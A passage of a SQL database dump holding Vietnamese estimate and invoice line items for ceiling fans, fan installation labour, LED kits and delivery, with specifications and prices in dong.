(687, 231, 'invoice', 'Thi công lắp đặt đường dây điện cấp nguồn quạt', 'Cáp điện 1.5m2 CVV (cáp điện Cadivi) bao gồm vật tư (dây điện, ống luồn dây điện...), nhân công thi công điện và thay đổi độ cao ty.', 1.00, 500000.00, 'lô', 3, 0, NULL, 0.00),
(688, 232, 'invoice', 'Quạt trần KATRINA 52 Gray Maple', 'Sải cánh 132cm ( ~ 52inch)  <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)  <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)  <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)  <br />\r\nĐèn LED: 3 màu, 2700K - 3000K  <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm  <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, '', 1, 50, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(689, 233, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nTuỳ chọn đèn: N/A (không có)', 2.00, 4650000.00, 'Cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(690, 234, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt White Wood', 'Sải cánh 152cm ( ~ 60inch) <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth) <br />\r\nMàu thân quạt: Matt White (Trắng mờ sơn tĩnh điện) <br />\r\nMàu cánh: Gỗ sáng (Maple Wood) <br />\r\nTuỳ chọn đèn: N/A (không có)', 2.00, 6800000.00, 'Cái', 1, 25, NULL, 0.00),
(691, 140, 'estimate', 'Gia cố ống ty nối dài - trụ ty dành cho quạt trần', 'Ống ty treo quạt inox - 80cm', 1.00, 350000.00, 'cái', 1, 0, '', 0.00),
(692, 140, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo quạt trần tấm thạch cao - bê tông = 1m', 1.00, 650000.00, '', 2, 0, '', 0.00),
(693, 235, 'invoice', 'Gia cố ống ty nối dài - trụ ty dành cho quạt trần', 'Ống ty treo quạt inox - 80cm', 1.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(694, 235, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Chi phí làm gia cố móc treo quạt trần tấm thạch cao + bê tông = 1m<br />\r\n(chưa bao gồm thuê, lắp giàn giáo)', 1.00, 650000.00, '', 2, 0, NULL, 0.00),
(695, 139, 'estimate', 'Ống ty treo quạt trần', 'Ống ty treo quạt trần nhà ở, chung cư', 1.00, 300000.00, 'cây', 6, 0, '', 0.00),
(700, 236, 'invoice', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 2.00, 6500000.00, 'cái', 1, 20, 'https://hgphome.com/uploads/items/1943/thumb_katrina_maple_wood.jpg', 0.00),
(703, 236, 'invoice', 'Quạt trần KATRINA Dark Wanut Gray', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ tối (Dark Wanut Gray)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 2.00, 6500000.00, 'Cái', 2, 20, 'https://hgphome.com/uploads/items/1940/thumb_katrina_dark.jpg', 0.00),
(706, 236, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 4.00, 500000.00, 'lô', 3, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(707, 141, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 3.00, 5800000.00, '', 1, 25, '', 0.00),
(708, 141, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo trần tấm thạch cao 500k/bộ<br />\r\n(yêu cầu khoảng cách từ bê tông - tấm thạch cao &lt;50cm)', 3.00, 500000.00, 'lô', 2, 0, '', 0.00),
(714, 143, 'estimate', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình Hồ Tràm', 1.00, 1800000.00, 'lô', 1, 0, NULL, 0.00),
(719, 143, 'estimate', 'Phí quản lý thi công', 'Chi phí đi lại, thuê giàn giáo <br />\r\nMua vật tư phụ', 1.00, 6000000.00, 'lô', 2, 0, '', 0.00),
(720, 143, 'estimate', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 13.00, 6300000.00, '', 3, 25, '', 0.00),
(721, 143, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc treo quạt ', 13.00, 800000.00, 'lô', 4, 0, '', 0.00),
(722, 144, 'estimate', 'Quạt trần phòng khách SANDY 66 Sliver', 'Sải cánh 173cm (~ 66inch)<br />\r\nMàu cánh: Sliver, chất liệu cánh nhựa ABS<br />\r\nMàu thân quạt: Brush Nickel, màu inox sáng<br />\r\nĐộng cơ DC, công suất 46W<br />\r\nĐiều khiển 6 cấp độ đi kèm<br />\r\nThương hiệu: Mountain Air/China<br />\r\nBảo hành 05 năm động cơ, 1 năm phụ kiện đi kèm', 1.00, 9000000.00, '', 1, 45, '', 0.00),
(723, 238, 'invoice', 'Quạt trần phòng khách SANDY 66 Sliver', 'Sải cánh 173cm (~ 66inch)<br />\r\nMàu cánh: Sliver, chất liệu cánh nhựa ABS<br />\r\nMàu thân quạt: Brush Nickel, màu inox sáng<br />\r\nĐộng cơ DC, công suất 46W<br />\r\nĐiều khiển 6 cấp độ đi kèm<br />\r\nThương hiệu: Mountain Air/China<br />\r\nBảo hành 05 năm động cơ, 1 năm phụ kiện đi kèm', 1.00, 9000000.00, '', 1, 45, NULL, 0.00),
(724, 145, 'estimate', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 15800000.00, '', 1, 25, '', 0.00),
(725, 239, 'invoice', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 15800000.00, '', 1, 28, NULL, 0.00),
(729, 240, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT<br />\r\nĐiều khiển ShengQi<br />\r\n3 tốc độ<br />\r\nSử dụng cho động cơ quạt trần AC motor', 5.00, 550000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1796/thumb_dieu-khien-3-cap-ac-.jpg', 0.00),
(730, 147, 'estimate', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 7900000.00, 'cái', 1, 0, '', 0.00),
(731, 148, 'estimate', 'Quạt trần cao cấp Haiku H Satin Nickel', '', 9.00, 36000000.00, '', 1, 15, '', 0.00),
(732, 149, 'estimate', 'Quạt trần Mountain Air 7010', '2 động cơ AC, công suất 75W x2  <br />\r\nSố cánh quạt: 8 cánh, chất liệu cánh bằng gỗ tự nhiên solid wood <br />\r\nMàu thân quạt: Đen <br />\r\nMàu cánh quạt: Dark Walnut <br />\r\nModel: 52YFT-7010 <br />\r\nThương hiệu: Mountain Air/China <br />\r\nĐiều khiển 3 tốc độ đi kèm', 1.00, 6000000.00, 'cái', 1, 0, '', 0.00),
(733, 149, 'estimate', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình. Miễn phí giao hàng Hà Nội', 1.00, 0.00, 'lô', 2, 0, '', 0.00),
(734, 241, 'invoice', 'Quạt trần Mountain Air 7010', '2 động cơ AC, công suất 75W x2  <br />\r\nSố cánh quạt: 8 cánh, chất liệu cánh bằng gỗ tự nhiên solid wood <br />\r\nMàu thân quạt: Đen <br />\r\nMàu cánh quạt: Dark Walnut <br />\r\nModel: 52YFT-7010 <br />\r\nThương hiệu: Mountain Air/China <br />\r\nĐiều khiển 3 tốc độ đi kèm<br />\r\nBảo hành: 1 năm', 1.00, 6000000.00, 'cái', 1, 0, NULL, 0.00),
(735, 241, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình. Miễn phí giao hàng Hà Nội', 1.00, 0.00, 'lô', 2, 0, NULL, 0.00),
(736, 150, 'estimate', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k', 1.00, 550000.00, '', 1, 0, '', 0.00),
(737, 150, 'estimate', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: thay adaptor đèn LED quạt trần Lucci Air', 1.00, 550000.00, '', 2, 0, '', 0.00),
(738, 150, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...   <br />\r\nCông việc:   <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'lô', 3, 0, '', 0.00),
(739, 242, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: 3 màu LED ánh sáng 3000K, 2700k', 1.00, 550000.00, '', 1, 0, NULL, 0.00),
(740, 242, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế: thay adaptor đèn LED quạt trần Lucci Air', 1.00, 550000.00, '', 2, 0, NULL, 0.00),
(741, 242, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...   <br />\r\nCông việc:   <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'lô', 3, 0, NULL, 0.00),
(742, 151, 'estimate', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 2.00, 5600000.00, '', 1, 0, '', 0.00),
(743, 243, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Trắng  <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 2.00, 5600000.00, '', 1, 25, NULL, 0.00),
(744, 243, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 2.00, 500000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(745, 243, 'invoice', 'Thay PIN điều khiển', 'Thay PIN mới cho điều khiển quạt - loại 3, 5, 6 tốc độ', 10.00, 15000.00, 'cái', 3, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(746, 242, 'invoice', 'Bộ đèn LED quạt trần', 'Bộ đèn LED thay thế:', 1.00, 550000.00, '', 4, 0, 'https://hgphome.com/uploads/items/1938/thumb_den-led.jpg', 0.00),
(748, 244, 'invoice', 'Quạt trần tiết kiệm điện TOBAGO 52 OAK (màu vân gỗ)', 'Sải cánh 132cm (52inch) <br />\r\nĐộng cơ DC, công suất 36W   <br />\r\nĐiều khiển 6 cấp độ    <br />\r\nMàu sắc: Vân Gỗ (KOA) <br />\r\nĐèn LED 12W, ánh sáng 3000K <br />\r\nThương hiệu: Mountain Air/China', 1.00, 0.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(749, 244, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(750, 245, 'invoice', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 7900000.00, 'cái', 1, 25, NULL, 0.00),
(751, 152, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, 'cái', 1, 25, '', 0.00),
(752, 246, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)   <br />\r\nĐèn LED: 3 màu, 2700K - 3000K   <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm', 1.00, 6300000.00, 'cái', 1, 25, NULL, 0.00),
(753, 247, 'invoice', 'Haiku L 52 inch White - Caramel', 'Sải cánh 132cm (52inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nMàu cánh: Caramel   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 18000000.00, 'bộ', 1, 0, 'https://hgphome.com/uploads/items/1948/thumb_haiku_L_caramel_52.jpg', 0.00),
(754, 247, 'invoice', 'Bộ đèn LED Haiku L series', 'Màu sáng : 2700K<br />\r\n (ánh sáng ấm trung tính)<br />\r\nCông suất 16W', 1.00, 2000000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(755, 153, 'estimate', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Trắng/Đen   <br />\r\nMàu cánh: Maple Wood   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China   <br />\r\n   <br />\r\n', 1.00, 7900000.00, 'cái', 1, 25, '', 0.00),
(756, 153, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 2, 0, '', 0.00),
(757, 154, 'estimate', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 15300000.00, '', 1, 25, '', 0.00),
(758, 154, 'estimate', 'Nhân công lắp đặt trần bê tông', '', 1.00, 850000.00, 'cái', 2, 0, '', 0.00),
(760, 248, 'invoice', 'Quạt trần KATRINA 52 Gray Maple Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 6500000.00, 'cái', 1, 25, 'https://hgphome.com/uploads/items/1943/thumb_katrina_maple_wood.jpg', 0.00),
(761, 249, 'invoice', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', 'Sải cánh 132cm <br />\r\nĐộng cơ DC, 35W hoạt động Êm, tiết kiệm điện <br />\r\nĐiều khiển 6 tốc độ <br />\r\nThương hieuej: WildMill / Made in India (Ấn Độ) <br />\r\nThiết kế dựa trên nguyên bản Marelli (Ý) <br />\r\nMotor đúc nguyên khối nhôm, có độ bền tản nhiệt cao', 1.00, 15300000.00, '', 1, 25, NULL, 0.00),
(762, 249, 'invoice', 'Nhân công lắp đặt trần bê tông', '', 1.00, 850000.00, 'cái', 2, 0, NULL, 0.00),
(764, 250, 'invoice', 'Khấu trừ chi phí khui Bộ đèn Led', 'Đèn LED Haiku L series, 2700k, dimmable 16 level', 1.00, 350000.00, 'cái', 1, 15, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(768, 204, 'invoice', 'Quạt trần cao cấp IRIS 60 Black ABS', 'Quạt trần HVLS Modern IRIS 60     <br />\r\nSải cánh: 152cm     <br />\r\nMàu sắc: Đen    <br />\r\nĐộng cơ EC, công suất 55 W (max speed)     <br />\r\nĐiều khiển 6 tốc độ đi kèm     <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, 15800000.00, 'cái', 3, 20, 'https://hgphome.com/uploads/items/1862/thumb_sunon-modern-black.jpg', 0.00),
(769, 204, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Đen <br />\r\nMàu cánh: Dark Walnut <br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT/Designed by Taiwan', 6.00, 6500000.00, '', 4, 25, 'https://hgphome.com/uploads/items/1883/thumb_onix-54.jpg', 0.00),
(770, 250, 'invoice', 'Haiku L 52 inch Black', 'Sải cánh 132cm (52inch)    <br />\r\nĐộng cơ EC, công suất 20.9W    <br />\r\nMàu thân/cánh: Black  <br />\r\nĐiều khiển từ xa 7 cấp đi kèm <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP) <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 20300000.00, '', 2, 15, 'https://hgphome.com/uploads/items/1851/thumb_Haiku_L.jpg', 0.00),
(771, 250, 'invoice', 'Ống ty treo quạt trần', 'Ống ty treo quạt trần nhà ở, chung cư', 1.00, 250000.00, 'cây', 3, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(772, 250, 'invoice', 'Khấu trừ phí khui thùng quạt Haiku L 44 inch', '', 1.00, 1850000.00, '', 4, 15, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(773, 250, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 500000.00, 'cái', 5, 0, 'https://hgphome.com/uploads/items/1924/thumb_lap_dat.jpg', 0.00),
(774, 155, 'estimate', 'Quạt trần SINO LED 52 Black Wood', 'Sải cánh 132cm ( ~ 52inch)      <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W      <br />\r\nMàu thân quạt: Matt Black(Đen sơn tĩnh điện)      <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)      <br />\r\nĐèn LED: 3 màu, 2700K - 3000K      <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm ', 1.00, 6300000.00, 'cái', 1, 20, '', 0.00),
(776, 157, 'estimate', 'Quạt trần 5 cánh gỗ NEXUS 60 maple wood', 'Sải cánh: 152cm (60 inch)   <br />\r\nChất liệu cánh: Gỗ tự nhiên (Maple Wood)   <br />\r\nĐộng cơ công suất 40W   <br />\r\nMóc treo quạt thiết kế loại áp sát trần - độ cao 30cm (dành cho trần thấp từ 2.8m - 3m)   <br />\r\nMàu thân: Đen   <br />\r\nMàu cánh: Dark Walnut   <br />\r\nĐiều khiển 5 tốc độ theo quạt   <br />\r\nThương hiệu: Tổ chức đào tạo WIT / China', 1.00, 7900000.00, 'cái', 1, 40, '', 0.00),
(777, 157, 'estimate', 'Phí tuỳ chỉnh màu sắc quạt', 'Màu sắc thân:  <br />\r\nMàu sắc cánh:<br />\r\nMàu sắc ống ty:', 1.00, 1000000.00, '', 2, 0, '', 0.00),
(782, 157, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Nhân công gia cố móc treo trần thạch cao', 2.00, 1250000.00, 'cái', 3, 0, '', 0.00),
(784, 158, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm <br />\r\nĐã bao gồm phí vận chuyển', 1.00, 5890000.00, '', 1, 0, '', 0.00),
(785, 156, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Sliver Wood', 'Sải cánh 142cm  <br />\r\nMàu thân quạt: Màu Sliver  <br />\r\nMàu cánh: Sliver  <br />\r\nĐộng cơ DC, công suất 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ  <br />\r\nThương hiệu: Tổ chức đào tạo WIT/Designed by Taiwan', 1.00, 6200000.00, 'cái', 1, 20, '', 0.00),
(786, 251, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm <br />\r\nĐã bao gồm phí vận chuyển', 1.00, 5890000.00, '', 1, 0, NULL, 0.00);
INSERT INTO `tblitemable` (`id`, `rel_id`, `rel_type`, `description`, `long_description`, `qty`, `rate`, `unit`, `item_order`, `discount`, `item_image`, `wh_delivered_quantity`) VALUES
(787, 157, 'estimate', 'Quạt trần cao cấp IRIS 60 White ABS', 'Quạt trần HVLS Modern IRIS 60   <br />\r\nSải cánh: 152cm   <br />\r\nĐộng cơ EC, công suất 55 W (max speed)   <br />\r\nĐiều khiển 6 tốc độ đi kèm   <br />\r\nThương hiệu: SUNON/Taiwan', 1.00, 15800000.00, 'cái', 4, 25, '', 0.00),
(788, 252, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Sliver Wood', 'Sải cánh 142cm  <br />\r\nMàu thân quạt: Màu Sliver  <br />\r\nMàu cánh: Sliver  <br />\r\nĐộng cơ DC, công suất 35W  <br />\r\nĐiều khiển từ xa 5 cấp độ  <br />\r\nThương hiệu: Tổ chức đào tạo WIT/Designed by Taiwan', 1.00, 6200000.00, 'cái', 1, 20, NULL, 0.00),
